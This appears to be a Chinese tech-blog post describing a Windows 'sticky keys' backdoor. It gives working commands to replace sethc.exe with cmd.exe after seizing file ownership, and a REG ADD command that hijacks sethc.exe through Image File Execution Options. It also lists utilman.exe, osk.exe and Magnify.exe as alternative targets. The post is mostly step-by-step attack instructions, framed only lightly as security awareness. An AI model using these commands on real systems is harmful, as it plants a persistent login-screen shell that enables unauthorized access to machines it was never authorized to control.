微软服务器操作系统后门,Windows操作系统后门

本文介绍了Windows系统中利用粘滞键(Shift键五连击)开启命令提示符或计算器的技巧,这可能成为系统安全的潜在风险。通过替换`sethc.exe`或修改注册表实现镜像劫持,黑客可以远程执行恶意程序。了解这些方法有助于提升系统安全意识,防范未授权访问。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

粘滞键后门

在windows上连续按5次“Shift”,就可以调出粘滞键。

方法一:

将C:\Windows\System32目录下的sethc.exe替换

如果目标机是 winvista 以上的,即 winvista 以后出的系统,修改 sethc 会提示需要 trustedinstaller 权限,所以想要继续,那就需要修改所有者为Administrator,并修改其权限:

b50531b01e86

b50531b01e86

修改完成后以管理员身份运行执行命令:

cd windows\system32

move sethc.exe sethc.exe.bak

copy cmd.exe sethc.exe

然后连续按5次“Shift”,就会弹出cmd框

方法二:

修改注册表,利用镜像劫持。镜像劫持可以理解为当你打开a.exe程序实际打开的却是b.exe程序,那么a程序就是被b程序劫持了。

执行如下命令:

REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\calc.exe"

在 ‘ HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\ CurrentVersion\Image File Execution Options ’中添加sethc.exe记录,在键值Debugger中设置我们要替换的程序,即可完成镜像劫持。

然后连续按5次“Shift”,就会弹出计算器

其他同理程序:

C:\Windows\System32\utilman.exe 设置中心 快捷键:Windows+U 键

C:\Windows\System32\osk.exe 屏幕键盘

C:\Windows\System32\Magnify.exe 放大镜 快捷键:Windows+加减号

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值